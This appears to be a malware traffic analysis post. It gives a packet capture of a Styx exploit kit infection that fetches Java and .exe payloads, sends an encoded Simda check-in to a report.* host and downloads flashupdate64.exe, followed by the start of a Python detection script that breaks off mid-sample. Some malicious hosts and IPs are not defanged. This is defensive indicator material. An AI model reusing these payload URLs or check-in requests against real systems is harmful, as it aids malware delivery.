EK Styx Exploit Kit Loads Simda Proxyer Proxy Malware GET /?G1i917= report.* Domain Name

June 19, 2015

2014-03-15 00:05:11.815264 IP 192.168.1.104.54571 > 209.18.47.61.53: 4151+ A? transit.thundernova[.]ca. (40)
E..D……hQ…h../=.+.5.0t..7………..transit.thundernova[.]ca…..
2014-03-15 00:05:11.867429 IP 209.18.47.61.53 > 192.168.1.104.54571: 4151 1/0/0 A 204.27.57.194 (56)
E..T..@.7..9../=…h.5.+.@ ?.7………..transit.thundernova[.]ca……………….9.
2014-03-15 00:05:11.868340 IP 192.168.1.104.49507 > 204.27.57.194.80: Flags [S], seq 4100960480, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…”….h..9..c.P.o…….. . $…………..
2014-03-15 00:05:11.927367 IP 204.27.57.194.80 > 192.168.1.104.49507: Flags [S.], seq 3208407014, ack 4100960481, win 65535, options [mss 1460,nop,wscale 6,sackOK,eol], length 0
E..4.`@.1..u..9….h.P.c.
204.27.57.194.80: Flags [.], ack 1, win 16425, length 0
E..(..@…”….h..9..c.P.o…
204.27.57.194.80: Flags [P.], seq 1:445, ack 1, win 16425, length 444
E…..@…!+…h..9..c.P.o…
192.168.1.104.49507: Flags [P.], seq 1:119, ack 445, win 1026, length 118
E….a@.1..
..9….h.P.c.
204.27.57.194.80: Flags [P.], seq 1:450, ack 1, win 16425, length 449
E…..@…!….h..9..d.PyN……P.@)y…GET /WcLyBChoVsGiB/ToeBzl.html HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: transit.thundernova[.]ca
Connection: Keep-Alive

2014-03-15 00:05:12.298004 IP 204.27.57.194.80 > 192.168.1.104.49508: Flags [P.], seq 1:119, ack 450, win 1026, length 118
E….i@.1…..9….h.P.d….yN..P…%…HTTP/1.0 200 Ok
Server: CppCMS-Embedded/1.0.4
Connection: close
Content-Encoding: gzip
Content-Type: text/html
2014-03-15 00:05:14.684921 IP 192.168.1.104.49509 > 204.27.57.194.80: Flags [P.], seq 1:301, ack 1, win 16425, length 300
E..T..@…!….h..9..e.P. …2PcP.@)h…GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: transit.thundernova[.]ca
Connection: Keep-Alive

2014-03-15 00:05:14.730214 IP 204.27.57.194.80 > 192.168.1.104.49509: Flags [P.], seq 1:167, ack 301, win 1026, length 166
E….n@.1…..9….h.P.e.2Pc. ..P…k…HTTP/1.0 404 Not Found
Server: CppCMS-Embedded/1.0.4
Connection: close
Content-Encoding: gzip
Content-Type: text/html; charset=us-ascii
Status: 404 Not Found

2014-03-15 00:05:14.731119 IP 192.168.1.104.49509 > 204.27.57.194.80: Flags [F.], seq 301, ack 167, win 16383, length 0
E..(..@…”….h..9..e.P. …2Q P.?.N………
2014-03-15 00:05:14.731129 IP 204.27.57.194.80 > 192.168.1.104.49509: Flags [P.], seq 167:351, ack 301, win 1026, length 184
E….o@.1…..9….h.P.e.2Q . ..P…'”…………u..
.@.E…/…)…..Q`&1.-‘F.A……M-.]……1..”..8dP.7.>.w.x c.D$.0..@t..+.L+k.4w…..+.a..!.LwGqBMM..6./=E…>U…u)…H..e.|..F.^.!7.[.l.G.’..
…..:.’..c.1G…..s…..
2014-03-15 00:05:14.731131 IP 204.27.57.194.80 > 192.168.1.104.49509: Flags [F.], seq 351, ack 301, win 1026, length 0
E..(.p@.1..q..9….h.P.e.2Q.. ..P….@……..
2014-03-15 00:05:14.731132 IP 192.168.1.104.49509 > 204.27.57.194.80: Flags [R.], seq 302, ack 351, win 0, length 0
E..(..@…”….h..9..e.P. …2Q.P….>……..
2014-03-15 00:05:14.770416 IP 204.27.57.194.80 > 192.168.1.104.49509: Flags [F.], seq 351, ack 302, win 1026, length 0
E..(.q@.1..p..9….h.P.e.2Q.. ..P….?……d.
2014-03-15 00:05:19.638739 IP 192.168.1.104.49510 > 204.27.57.194.80: Flags [S], seq 2371901753, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…”….h..9..f.P.`Y9…… ……………..
2014-03-15 00:05:19.691035 IP 204.27.57.194.80 > 192.168.1.104.49510: Flags [S.], seq 1715225697, ack 2371901754, win 65535, options [mss 1460,nop,wscale 6,sackOK,eol], length 0
E..4.r@.1..c..9….h.P.ff
204.27.57.194.80: Flags [.], ack 1, win 256, length 0
E..(..@…”….h..9..f.P.`Y:f
204.27.57.194.80: Flags [P.], seq 1:294, ack 1, win 256, length 293
E..M..@…!….h..9..f.P.`Y:f
192.168.1.104.49510: Flags [P.], seq 1:110, ack 294, win 1026, length 109
E….s@.1…..9….h.P.ff
204.27.57.194.80: Flags [P.], seq 1:251, ack 1, win 256, length 250
E..”.,@…!….h..9..g.Pf..(…cP…H…GET /WcLyBChoVsGiB/gmkCPZN.jar HTTP/1.1
accept-encoding: pack200-gzip,gzip
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_33
Host: transit.thundernova[.]ca
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

2014-03-15 00:05:19.987032 IP 204.27.57.194.80 > 192.168.1.104.49511: Flags [P.], seq 1:110, ack 251, win 1026, length 109
E….~@.1…..9….h.P.g…cf..”P…….HTTP/1.0 200 Ok
Server: CppCMS-Embedded/1.0.4
Connection: close
Content-Type: application/java-archive
2014-03-15 00:05:20.626723 IP 192.168.1.104.49512 > 204.27.57.194.80: Flags [P.], seq 1:235, ack 1, win 256, length 234
E….@@…!….h..9..h.Pj.[is2.nP…
…GET /WcLyBChoVsGiB/soft_1.exe&h=14 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_33
Host: 436sfdh.safebrowsing-cant-stop-me.info
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

2014-03-15 00:05:20.665718 IP 204.27.57.194.80 > 192.168.1.104.49512: Flags [P.], seq 1:110, ack 235, win 1026, length 109
E…..@.1…..9….h.P.hs2.nj.\SP…S…HTTP/1.0 200 Ok
Server: CppCMS-Embedded/1.0.4
Connection: close
Content-Type: application/x-msdownload
2014-03-15 00:05:43.063778 IP 192.168.1.104.49525 > 79.142.66.240.80: Flags [P.], seq 1:618, ack 1, win 256, length 617
E….2@……..hO.B..u.P…X..\oP…….GET /?G1i917=%96%C9%D2%9F%D7%A9_%95%96g%A2i%AC%9A%98%9Bc%99%97%91%97%93%92h%96_%97%A5%9Exc%99%9DW%AE%E8%A2%E7%E5%A9%9A%A3%CE%95t%9Ce%B2h%95%8B%9D%CF%C8%9E%C6%CF%8E%88%84T%D0%D8%D1%84c%AEory%AA%99%B3%A2%A7%A4t%9Atg%ACt%BAh%95%9Ed%A7%A2%9A%93%A3%A5yh_%97%95%DF%AC%A4%A6iag%A2%95%A1%A6%A2%A4%5E%95bg%9Bc%A9g%93%95a%87%D7%9E%91%91%91ca_%A9%B2%93%B9%AB%A6oe%5B HTTP/1.1
Host: report.e17k3y7ce1aaaaaa31[.]com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

2014-03-15 00:05:43.063790 IP 192.168.1.104.49525 > 79.142.66.240.80: Flags [F.], seq 618, ack 1, win 256, length 0
E..(.3@……..hO.B..u.P……\oP….J……..
2014-03-15 00:05:43.063792 IP 192.168.1.104.49526 > 79.142.66.240.80: Flags [S], seq 514415991, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.4@……..hO.B..v.P..]w…… ……………..
2014-03-15 00:05:43.205689 IP 79.142.66.240.80 > 192.168.1.104.49525: Flags [.], ack 619, win 8135, length 0
E..(.=@.,. .O.B….h.P.u..\o….P…k……V..
2014-03-15 00:05:43.206696 IP 79.142.66.240.80 > 192.168.1.104.49525: Flags [P.], seq 1:367, ack 619, win 8212, length 366
E….>@.,…O.B….h.P.u..\o….P. ..+..HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 15 Mar 2014 04:03:00 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: http://www.bing[.]com/


301 Moved Permanently

301 Moved Permanently


nginx


2014-03-15 00:05:43.206700 IP 79.142.66.240.80 > 192.168.1.104.49525: Flags [F.], seq 367, ack 619, win 8212, length 0
E..(.?@.,. .O.B….h.P.u..]…..P. .i……n..
2014-03-15 00:05:43.206702 IP 192.168.1.104.49525 > 79.142.66.240.80: Flags [R.], seq 619, ack 367, win 0, length 0
E..(.5@……..hO.B..u.P……].P………….
2014-03-15 00:05:43.220928 IP 79.142.66.240.80 > 192.168.1.104.49526: Flags [S.], seq 1753673696, ack 514415992, win 65535, options [mss 1460,nop,wscale 3,sackOK,eol], length 0
E..4.C@.,…O.B….h.P.vh…..]x…..(…………..
2014-03-15 00:05:43.220938 IP 192.168.1.104.49526 > 79.142.66.240.80: Flags [.], ack 1, win 256, length 0
E..(.6@……..hO.B..v.P..]xh…P………….
2014-03-15 00:05:43.223425 IP 192.168.1.104.49526 > 79.142.66.240.80: Flags [P.], seq 1:609, ack 1, win 256, length 608
E….7@……..hO.B..v.P..]xh…P…….GET /?555qG5558=%96%C9%D2%9F%D7%A9_%95%96g%A2i%AC%9A%98%9Bc%99%97%91%97%93%92h%96_%97%A5%9Efge%D5m%AC%ABr%AF%E8%9C%96%E4%DB%D8k%96cp%9Ce%9F%A3%D1%CCn%C6%CF%8E%B6%B4%87%A0%9A%92%A0%A1%B2kvw%A9%7Bxhjh%B8%9A%B3%9F%B3%B5o%96cp%9Ey%BAp%95%A7u%A7%98%92%95%87%D3%98%A4k%93%9F%9Deej%A9weeei%A2%95%A0%9F%A2%A4%5E%95W%AD%A8c%A9g%93%95b%A7%A4%87%D3%DB%9EieR HTTP/1.1
Host: report.e17k3y7ce1aaaaaa31[.]com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

2014-03-15 00:05:43.223436 IP 192.168.1.104.49526 > 79.142.66.240.80: Flags [F.], seq 609, ack 1, win 256, length 0
E..(.8@…. …hO.B..v.P.._.h…P………….
2014-03-15 00:05:43.367404 IP 79.142.66.240.80 > 192.168.1.104.49526: Flags [.], ack 610, win 8136, length 0
E..(..@.,…O.B….h.P.vh….._.P………..f5
2014-03-15 00:05:43.368461 IP 79.142.66.240.80 > 192.168.1.104.49526: Flags [P.], seq 1:367, ack 610, win 8212, length 366
E…..@.,..GO.B….h.P.vh….._.P. ..v..HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 15 Mar 2014 04:03:00 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: http://www.bing[.]com/


301 Moved Permanently

301 Moved Permanently


nginx


2014-03-15 00:05:43.368472 IP 79.142.66.240.80 > 192.168.1.104.49526: Flags [F.], seq 367, ack 610, win 8212, length 0
E..(..@.,…O.B….h.P.vh..O.._.P. ………..
2014-03-15 00:05:43.368474 IP 192.168.1.104.49526 > 79.142.66.240.80: Flags [R.], seq 610, ack 367, win 0, length 0
E..(.9@……..hO.B..v.P.._.h..OP….”……..
2014-03-15 00:05:43.902871 IP 192.168.1.104.49527 > 5.149.248.85.80: Flags [S], seq 1800387166, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.:@…(….h…U.w.PkO.^…… ……………..
2014-03-15 00:05:44.056917 IP 5.149.248.85.80 > 192.168.1.104.49527: Flags [S.], seq 2424526948, ack 1800387167, win 65535, options [mss 1460,nop,wscale 3,sackOK,eol], length 0
E..4..@……..U…h.P.w..XdkO._………………..
2014-03-15 00:05:44.056927 IP 192.168.1.104.49527 > 5.149.248.85.80: Flags [.], ack 1, win 16425, length 0
E..(.;@…(….h…U.w.PkO._..XeP.@).P……..
2014-03-15 00:05:44.056929 IP 192.168.1.104.49527 > 5.149.248.85.80: Flags [P.], seq 1:297, ack 1, win 16425, length 296
E..P.<@...'q...h...U.w.PkO._..XeP.@)(...GET /flashupdate64.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 5.149.248.85
Connection: Keep-Alive

2014-03-15 00:05:44.203146 IP 5.149.248.85.80 > 192.168.1.104.49527: Flags [.], seq 1:1461, ack 297, win 8212, length 1460
E…..@….d…U…h.P.w..XekO..P. .. ..HTTP/1.1 200 OK
Server: nginx
Date: Sat, 15 Mar 2014 04:05:44 GMT
Content-Type: application/octet-stream
Content-Length: 7058432
Last-Modified: Thu, 20 Feb 2014 22:17:00 GMT
Connection: keep-alive
Accept-Ranges: bytes

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

2014-03-15 00:05:49.569803 IP 5.149.248.85.80 > 192.168.1.104.49527: Flags [.], seq 3144502:3145962, ack 297, win 8212, length 1460
E…..@….5…U…h.P.w..S.kO..P. ..6….fD…f.8..f.8..H…f.8..f.8…{…ff………A…A..K.D.W.M.[ A.W.f.8….A…M.[.u.f.8..A….(4$.(|$.D.(D$ D.(L$0H.d$XH.|$.H.t$…ff………H.|$.H.t$.H..H..H..L..L..L.D$(H..$8….)t$ .)|$0D.)D$@D.)L$PD.)T$`D.)\$pD.).$….D.).$….D.).$….D.).$….H……….E.o0fD.o=….1.fE.:…fD.:”……..A..fE…fE…fE.:”..M.Z.fE.:”..A..fE.:”..I..fE.:”..A..fE.:”..I..fE.:”..fD..$$fE.8..fD..l$.fE.8..fA.p..fA.p..fA.p.@H………..I..A..H…..fff………fA.p..fA…A…fA.p..fA…A..K.fA.p.@fA…fA….W.fA…fA…f…f.8..I.K f…f.8..fD.o-%…f…f.8..fD.o$$f…f.8..f……..f.8..f.8…(……..f.8..f.8….f.8..f.8..f.8..f.8….I.f.8..f.8..H.I f.8..f.8..f.8..f.8…..u.f.8..fE…f.8..fD..l$.f.8..fD..$$f.8..fD..l$.f.8..fE.8..f.8..fE.8..f.8..D…f.8..D..O.f.8..D..W f.8..D.._0f.8….O@f.8….GPH..`D.W.fA.p..D.W.fA.p..D…D.W.fA.p.@D..N.D.W.D..V .W.D..^0.W…N@..FPH.v`D..H…..Q…H….._…L…D..fA…D…H………fA…D..O…….fA.p..fA…D..W H………fA.p..fA…D.._0……fA….W……..O@D.W.D.W.D…D.W.D..N.D.W.D..V .W.D..^0..N@…..ffff………A…D…………..I.H.I .W.f.8…… H.I.u.f.8..D.W.D….}..D…W……D.W.D.W.D…D..N..]..D…k…D.W.D.W.D…D.W.D..N.D..V .7ffffff…………..D.W.D.W.D…D.W.D..N.D.W.D..V D..^0.(t$ .(|$0D.(D$@D.(L$PD.(T$`D.(\$pD.(.$….D.(.$….D.(.$….D.(.$….H..$….H.|$.H.t$…fffff………H.|$.H.t$.H..H..H..L..L..L.D$(L.L$0H..$…..)t$`.)|$pD.).$….D.).$….D.).$….D.).$….D.).$….D.).$….D.).$….D
2014-03-15 00:05:49.572568 IP 5.149.248.85.80 > 192.168.1.104.49527: Flags [.], seq 3145962:3147422, ack 297, win 8212, length 1460
E…..@….5…U…h.P.w..YNkO..P. ……).$….E..9A……D……A…A..H.M.@ D.W.fD.8….A…M.@.u.fD.8..I..D..I..H…fD.o.R…fE…fE.f.fE.p..fE…fE.o.fE…fE…fE.f.fE…fE.p..fE…fE.o.fE…fE…fE.f.fE…fE.p..fE…fE.o.fE…fE…fE.f.fE…fE.p..fE…fE.o.fE…fE…fE.f.fE…H..`………..A……@.fE.p..fE.o.fE…..o.fE…..o_.fE…..og fA…..oo0fA…..ow@fA…..o.PH..`fA…A…fA…fA…A..K.f…f…fD…$f.8..I.K f…fD..\$.f.8..f…fD..d$ f.8..f…fD..l$0f.8..f……..fD..t$@f.8..fD..|$Pf.8..fE…fE.f..*f………f.8..f.8….f.8..f.8..f.8..f.8….I.f.8..f.8..H.I f.8..f.8..f.8..f.8…..u.fE.p..fE…fE…f.8..fE…f.8..fE.f.f.8..fE…f.8..f.8..f.8….I.fE.p..fE…fE.o.fE…f.8..fE…f.8..fE.f.f.8..fE…f.8..f.8..f.8….A fE.p..fE…fE.o.fE…f.8..fE…f.8..fE.f.f.8..fE…f.8..f.8..f.8..fE.p..fE…fE.o.fE…f.8..fE…f.8..fE.f.f.8..fE…f.8..f.8..f.8..fE.p..fE…fE.o.fE….W.$fE….W\$.fE.f.fE….Wd$ ….Wl$0..^..Wt$@..f .W|$P..n0D….v@..~PH.v`H..`..a….D..L..A..H..`……H.. …………H..@..3…..}…fE.p..fE.o.fE…..o.fE…..o_.fE…..og fA…..oo0fA…..ow@H..PfA…fA…fA……..A.W.fE.o.A.W.A.W…..A.W….^.A.W….f …n0…v@H.vP.O…ffffff…………H…A.W……I.H.I .W.f.8…… H.I.u.f.8..A.W.fE.o….H.v……ffff………….._.H.. A.W.A.W..X…A.W.fE.o.A.W……^.H.v …..ff………….._…g H..0A.W.A.W.A.W……A.W.fE.o.A.W.A.W……^…f H.v0.nfffff………….._…g A.W…o0H..@A.W.A.W.A.W……A.W.fE.o.A.W.A.W….A.W…^…f ..n0H.v@..fffff..
2014-03-15 00:05:49.572580 IP 192.168.1.104.49527 > 5.149.248.85.80: Flags [.], ack 3147422, win 65335, length 0
E..(..@…$….h…U.w.PkO…._.P..7.M……..
2014-03-15 00:05:49.574145 IP 5.149.248.85.80 > 192.168.1.104.49527: Flags [.], seq 3147422:3148882, ack 297, win 8212, length 1460
E…..@….4…U…h.P.w.._.kO..P. .WJ………I…tYL…….N.H….F…H.v.H…u.L).L..D….V.A.W……I.H.I .W.f.8…… H.I.u.f.8..A.W…V..(t$`.(|$pD.(.$….D.(.$….D.(.$….D.(.$….D.(.$….D.(.$….D.(.$….D.(.$….H..$….H.|$.H.t$…ff………H.|$.H.t$.H..H..H..L..L..L.D$(L.L$0H..$…..)t$`.)|$pD.).$….D.).$….D.).$….D.).$….D.).$….D.).$….D.).$….D.).$….E..9A……D……A…A..H.M.@ D.W.fD.8….A…M.@.u.fD.8..1.H………H…H).I..D..I..H…fD.o.?…fE…fE.f.fE.p..fE…fE.o.fE…fE…fE.f.fE…fE.p..fE…fE.o.fE…fE…fE.f.fE…fE.p..fE…fE.o.fE…fE…fE.f.fE…fE.p..fE…fE.o.fE…fE…fE.f.fE…H..`………..A…..fE.p..fE.o.fE…..o.fE…..o_.fE…..og fA…..oo0fA…..ow@fA…..o.PH..`fA…A…fA…fA…A..K.f…f…fD…$f.8..I.K f…fD..\$.f.8..f…fD..d$ f.8..f…fD..l$0f.8..f……..fD..t$@f.8..fD..|$Pf.8..fE…fE.f..*f………f.8..f.8….f.8..f.8..f.8..f.8….I.f.8..f.8..H.I f.8..f.8..f.8..f.8…..u.fE.p..fE…fE…f.8..fE…f.8..fE.f.f.8..fE…f.8..f.8..f.8….I.fE.p..fE…fE.o.fE…f.8..fE…f.8..fE.f.f.8..fE…f.8..f.8..f.8….A fE.p..fE…fE.o.fE…f.8..fE…f.8..fE.f.f.8..fE…f.8..f.8..f.8..fE.p..fE…fE.o.fE…f.8..fE…f.8..fE.f.f.8..fE…f.8..f.8..f.8..fE.p..fE…fE.o.fE….W.$fE….W\$.fE.f.fE….Wd$ ….Wl$0..^..Wt$@..f .W|$P..n0D….v@..~PH.v`H..`..a….D..L..A..H..`..=…H.. …………H..@..S………fE.p..fE.o.fE…..o.fE…..o_.fE…..og fA…..oo0fA…..ow@H..PfA…fA…fA……..A.W.A.W.A.W…..A.W….^.A.W….f fE..
2014-03-15 00:05:49.575295 IP 5.149.248.85.80 > 192.168.1.104.49527: Flags [.], seq 3148882:3150342, ack 297, win 8212, length 1460
E…..@….4…U…h.P.w..d.kO..P. .Td……n0fE.f….v@H.vPfE.p..I………fE.o.fE…fE…fE….p…f..D…..H…A.W……I.H.I .W.f.8…… H.I.u.f.8..A.W.fE.o….fE.o.H.v………………._.H.. A.W.A.W……A.W.fE.o.A.W.fE.o……^.H.v …..f..D……._…g H..0A.W.A.W.A.W..P…A.W.fE.o.A.W.fE.o.A.W……^…f H.v0…..f..D..fE.p..fE.o.fE……fE….._.fE…..g A.W…o0H..@A.W.A.W.A.W……A.W.fE.o.A.W.fE.o.A.W….A.W…^…f ..n0H.v@..ffffff………I………L..L..D…..A.W……I.H.I .W.f.8…… H.I.u.f.8..A.W……G….H……N.H.v.H…u.L).L..D…..A.W……I.H.I .W.f.8…… H.I.u.f.8..A.W…..(t$`.(|$pD.(.$….D.(.$….D.(.$….D.(.$….D.(.$….D.(.$….D.(.$….D.(.$….H..$….H.|$.H.t$…f.H.|$.H.t$.H..H..H..L..L..L.D$(L.L$0H……..D……I..E……..A…D..H…rcH…..fffff…………H……..I..W.H.I .W.f.8…… H.I.u.f.8..D..L…..H.v.H…s.H…u A….6…H..H….f……H).1…f.H…D..H..L..H1……….H.d$..)4$.)|$.D.)D$ D.)L$0E…D..H..p..?…A..H..pD..D.)L$@……)D$@D…H.v………_…I.H.I ..og .W…oo0.W…ow@f.8..f…..o.Pf.8..f….D.oG`f.8..f….D.oOpf.8..f…..f.8..fD…f.8..fD……fD.8..fD.8….I………..G..WT$@.W…O .W…G0.W…O@.W…GP.W…O`D.W…GpD.W……^…f ..n0D….v@L….~PH……D..F`H.vpH…………A.(.D.(.H..p..b……C.D..H.v….D.(.H……….._..(.H.. ……..g .(.H..0……..o0H..@..5…..w@H..P..g……PH..`……D..G`D.)L$@.I……..G..WT$@.W…O .W…G0.W…O@.W…GP.W.D..O`D.W……^…f ..n0..v@..~PH.v`A.(.H..p…
2014-03-15 00:05:49.575306 IP 192.168.1.104.49527 > 5.149.248.85.80: Flags [.], ack 3150342, win 65335, length 0
E..(..@…$….h…U.w.PkO….jjP..7……….
2014-03-15 00:05:49.576246 IP 5.149.248.85.80 > 192.168.1.104.49527: Flags [.], seq 3150342:3151802, ack 297, win 8212, length 1460
E…..@….3…U…h.P.w..jjkO..P. .X…..ffff…………..I.H.I .W.f.8…… H.I.u.f.8..A.W.E.(.H….L…fff……….W..8…A.W.A.W….D.(..(.H.v.H.. …..f………….A.W.A.W…..W…^.D.(..(.H.v H..0…….D…….A.W.D..O0A.W…..W…^..W…f .(.H.v0H..@…..ffff……….W……..O…G A.W.A.W..W…O0.W.D..O@.W……^…f ..n0H.v@.(.H..P.Zf…………….O…G A.W.A.W..W…O0.W…G@.W.D..OP.W……^…f ..n0..v@H.vP.(.H..`..f.H…E…u……..)T$@H……H..H).H.t$@..f..(4$.(|$.D.(D$ D.(L$0H.d$XH.|$.H.t$…ffffff………H….g……..uNI.L..A….. …A…M.@.H.I.A….. f.8..f.8..M.@.H.I…A.A..H.L9.w.A…f.8…..H…..fff………H…H……H……..M…………W.I.@……………………………….. …A…f.:……..f.:……..f.:……..f.:……..f.:……..f.:.. .z…f.:..@.o…f.:….d…f.:….Y…f.:..6.N…….PP1..8……~Q……A…f.:….N…f.:….|…f.:….1…f.:….f…f.:……..f.:.. .P…f.:..@…..f.:….:…….P0H1……fff………..Q……H.@.A…A..P.f.:….&…f.:….4…f.:…. …f.:……..f.:……..f.:……..f.:……..f.:……..f.:……..f.:……..f.:.. …..f.:.. …..f.:..@………P.H1…H……H………..H.@……W……W……W…f….H.@..(…..f.o..W…..f.s…W.f.p.Uf…f…f.p..f………….(….D..(…N..X.H.@ ………….H.@……W……W……W…f….H.@……W……W……W………………………………………………….
…………………………………………………AES for Intel AES-NI,
2014-03-15 00:05:49.576594 IP 5.149.248.85.80 > 192.168.1.104.49527: Flags [.], seq 3151802:3153262, ack 297, win 8212, length 1460
E…..@….3…U…h.P.w..p.kO..P. ..f.. CRYPTOGAMS by ………VWSUATAUAVAW.H..@I…………..VWSUATAUAVAW.H..@I.@xI……I.q.M.Y8E..N…L9…|…I……E.S.N…L9…d…H.0I………….H.H.@X.H………..VWSUATAUAVAW.H..@I.@xI……L……L9…….I……L……L9…….H.p I………….H.H………..ffff………VWSUATAUAVAW.H..@I.@xI……I.q.M.Y8E..N…L9…….I……E.S.N…L9…….H.p`I………….H.H…….g…….VWSUATAUAVAW.H..@I……I……L..Z…L9.r5L..h…L9.r%L..G…L9.s.H.0I………….H.H.@X..I.@xH.x.H.p.I……I……I……I.y(L………H.L..H1.H.V.L..L.N.L.V(L.^8L.f.L.T$ L.\$(L.d$0H.L$8….<......H..@.A_A^A]A\][_^......................................................L..)/..fD.o.H.@.fA.o{PfE...fA...fD.8..fA...f.8..fA...f.8..fA...f.8..fA...f.8..fA...f.8..fA...f.8..f.8..fA.o;fE.oC.fD.o.f.s..fD.o.f.s..f...f...f...f...f...f.s..f...f.s..fA...fA...fD.o.f.s..fE.o.fA.s..f...fD...f...fD...f...f.s..fA...fA.s..fA...fE...fA.o{ fD.o.f.s..fD.o.f.s..f...f...fA...fA...f...f.s..f...f.s..fA...fA...fD.o.f.s..fE.o.fA.s..f...fD...fA...fE...f...f.s..fA...fA.s..fA...fE...fD.o.f.s..fD.o.f.s..f...f...f...f...f...f.s..f...f.s..fA...fA...fD.o.f.s..fE.o.fA.s..f...fD...f...fD...f...f.s..fA...fA.s..fA...fE...A...Y.fD..8f..@.fD.8..f..H f.8..f..P0f.8..f..X@f.8..f..`Pf.8..f..h`f.8..f..ppf.8..H......f.8..f...f...fA...f...fA...f...f...f...f...f...f...f...f...fD.o.fD.o.fD.o.fD.o.fD.o.fD...fD...fD...fE.o.fD...fA.o.fE...fE.o.fE...fE...fD...fE...fE...fA...fE...fD.o.fE
2014-03-15 00:05:49.576598 IP 192.168.1.104.49527 > 5.149.248.85.80: Flags [.], ack 3153262, win 65335, length 0
E..(..@…$….h…U.w.PkO….u.P..7.}……..
2014-03-15 00:05:49.577281 IP 5.149.248.85.80 > 192.168.1.104.49527: Flags [.], seq 3153262:3154722, ack 297, win 8212, length 1460
E…..@….2…U…h.P.w..u.kO..P. ……..fE…fE…fE…fD.o.fD.o.fD…fD…fE.o.fE…fE…fA…fE…fE…fE…fD.o.fA…fD.o.fE…fD.o.fD…fD.o.fE…fD…fD…fE…fE…fE…fA…fE.o.fE…fE…fD.o.fE.o.fE…fE…fE.o.fE…fD…fE…fE…fE.o.fD…fE…fE…fD…fE…fE…fE…fE…fD.o.f.o.fE.o.fE…fD…f…fA…fA…f…fA…fE…f…fE…fE…fE.o.fE.o.fE…fE…fE…fE…fD…fD…fA…fA…fE…fE…fA…fD…fE…fA…fA…fE…f…f…fD.o.f.o.fD…f…fE.o.fE.o.fE…fE…fE…fD…fD…f…fA…fA…fE…fA…fA…f…fE…fA…fE…fE…fE.o.fE…fD…f…fA…fA…f…fA…fA…fA…f…f…fA…f…f…fA…fD…f…f…f…f…f…f…A……..fA.p..fD.p..fD…fD.p..fA…fD.p..fA…fD…skipping…
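The HTTP side of the capture above, from the landing page on transit.thundernova[.]ca to the flashupdate64.exe download, can be turned into request-level checks. What follows is an added example, not code from the original post: it parses tcpdump -A style text (coping with the dotted binary residue that precedes each request line, and with packet header lines the page has lost), attaches the packet header to each request, and applies checks that follow from what the capture shows: the Java plug-in User-Agent (Java/1.6.0_33) fetching a .jar and then an .exe from the same /WcLyBChoVsGiB/ directory that served the landing page to the browser; an .exe fetched with a bare IP in the Host header; and the Simda-style check-in, a single-parameter query with a throwaway parameter name (G1i917, then 555qG5558) whose value decodes mostly to bytes above 0x7F, sent to a report.* host by a User-Agent with no Windows NT token. The rule names, the 0.5 high-byte threshold and the SAMPLE excerpt are this example's own; SAMPLE is constructed from request lines on this page.

```python
# Added example (not code from the original post): parse tcpdump -A style text,
# pair each HTTP request with the packet header that carried it, and apply checks
# drawn from what the capture above shows. Rule names, the 0.5 high-byte threshold
# and SAMPLE are this example's own; SAMPLE is constructed from request lines on
# this page, with tcpdump's dotted binary residue left in front of each GET.
import re
from urllib.parse import unquote_to_bytes

SAMPLE = r"""
E.....@...!+...h..9..c.P.o...GET /WcLyBChoVsGiB/ToeBzl.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: transit.thundernova[.]ca

E..".,@...!....h..9..g.Pf..(...cP...H...GET /WcLyBChoVsGiB/gmkCPZN.jar HTTP/1.1
accept-encoding: pack200-gzip,gzip
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_33
Host: transit.thundernova[.]ca

2014-03-15 00:05:20.626723 IP 192.168.1.104.49512 > 204.27.57.194.80: Flags [P.], seq 1:235, ack 1, win 256, length 234
E....@@...!....h..9..h.Pj.[is2.nP...
...GET /WcLyBChoVsGiB/soft_1.exe&h=14 HTTP/1.1
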